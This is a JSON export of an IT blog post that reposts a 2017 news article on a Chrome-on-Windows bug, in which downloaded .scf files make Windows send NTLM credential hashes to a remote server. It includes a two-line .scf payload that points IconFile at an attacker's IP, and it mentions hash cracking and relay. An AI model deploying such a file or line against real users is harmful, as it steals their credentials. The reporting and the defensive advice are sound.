{"id":286895,"date":"2017-05-17T15:31:49","date_gmt":"2017-05-17T20:31:49","guid":{"rendered":"http:\/\/itblog.lcisd.net\/?p=286895"},"modified":"2017-05-17T15:31:49","modified_gmt":"2017-05-17T20:31:49","slug":"chrome-on-windows-has-credential-theft-bug","status":"publish","type":"post","link":"https:\/\/itblog.lcisd.net\/?p=286895","title":{"rendered":"Chrome on Windows has credential theft bug"},"content":{"rendered":"<h1>Chrome on Windows has credential theft bug<\/h1>\n<h2>.SCF files present ID, password to fetch icons for attack file<\/h2>\n<div class=\"article_head multi_page\">\n<div class=\"byline\"><span class=\"dateline\"> 17 May 2017 at 02:09, <\/span> <a class=\"alt_colour dcl\" title=\"Read more by this author\" href=\"https:\/\/www.theregister.co.uk\/Author\/2242\">Richard Chirgwin<\/a><\/div>\n<div class=\"byline\">\n<hr \/>\n<\/div>\n<\/div>\n<div id=\"body\">\n<p>Google&#8217;s Chrome team is working to fix a credential theft bug that strikes if the browser is running on Microsoft Windows.<\/p>\n<p>The bug is exploited if a user is tricked into clicking a link that downloads a Windows .scf file (the ancient Shell Command File format, a shortcut to Show Desktop since Windows 98).<\/p>\n<p>This exploits two things: how Chrome handles .scf files, and how Windows handles them.<\/p>\n<p>Most download links are sanitised by Chrome \u2013 for example, as discoverers DefenseCode <a href=\"http:\/\/defensecode.com\/news_article.php?id=21\" target=\"_blank\" rel=\"noopener noreferrer\">write<\/a>, since Stuxnet the browser has forced a .download extension onto Windows LNK files \u2013 but not .scf files.<\/p>\n<p>That arrangement means that if the user clicks the link, the malicious .scf file will lie dormant in the <code>\/Downloads<\/code> directory until the next time the user opens the folder.<\/p>\n<p>Here&#8217;s where the Windows flaw comes in: merely viewing the folder will trigger Windows to try and retrieve an icon associated with the .scf file.<\/p>\n<p>To retrieve the icon, the user&#8217;s machine will present credentials to a server \u2013 their user ID and hashed password on a corporate network, or the home group&#8217;s credentials if it&#8217;s a personal machine.<\/p>\n<p>Naturally enough, since this involves credentials, they&#8217;re available to the attacker.<\/p>\n<p>If the .scf file contains this code:<\/p>\n<pre>[Shell]\r\nIconFile=\\\\170.170.170.170\\icon\r\n<\/pre>\n<p>\u2026 then the user ID and hashed password will be presented to the attacker&#8217;s IP.<\/p>\n<p>Since it&#8217;s an NTLMv2 hashed password, to recover it would need offline brute-force cracking, but SecureCode points out that user ID and the hash can be presented to other services.<\/p>\n<p>\u201cThe remote SMB server set up by the attacker is ready to capture the victim&#8217;s username and NTLMv2 password hash for offline cracking or <b>relay the connection<\/b> to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password\u201d writes Defense Code&#8217;s Bosko Stankovic [emphasis added].<\/p>\n<p>Password brute-forcing is only moderately difficult, the post says: an NVIDIA GTX 1080 card should manage to recover an eight-character password in less than a day.<\/p>\n<p>While users wait for a fix from Google, Chrome users should get to their Advanced settings, and make Chrome ask where downloaded files are to be saved: that way, the .scf extension will be revealed.<\/p>\n<p>Google <a href=\"https:\/\/threatpost.com\/chrome-browser-hack-opens-door-to-credential-theft\/125686\/\" target=\"_blank\" rel=\"noopener noreferrer\">told<\/a> Kaspersky&#8217;s ThreatPost it&#8217;s aware of the issue and is working on a fix. \u00ae<\/p>\n<\/div>\n<div><a href=\"https:\/\/www.theregister.co.uk\/2017\/05\/17\/chrome_on_windows_has_credential_theft_bug\/\" target=\"_blank\" rel=\"noopener noreferrer\">Entire article and comments.<\/a><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Chrome on Windows has credential theft bug .SCF files present ID, password to fetch icons for attack file 17 May 2017 at 02:09, Richard Chirgwin Google&#8217;s Chrome team is working to fix a credential theft bug that strikes if the<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-286895","post","type-post","status-publish","format-standard","hentry","category-security"],"_links":{"self":[{"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=\/wp\/v2\/posts\/286895","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=286895"}],"version-history":[{"count":2,"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=\/wp\/v2\/posts\/286895\/revisions"}],"predecessor-version":[{"id":286897,"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=\/wp\/v2\/posts\/286895\/revisions\/286897"}],"wp:attachment":[{"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=286895"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=286895"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=286895"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}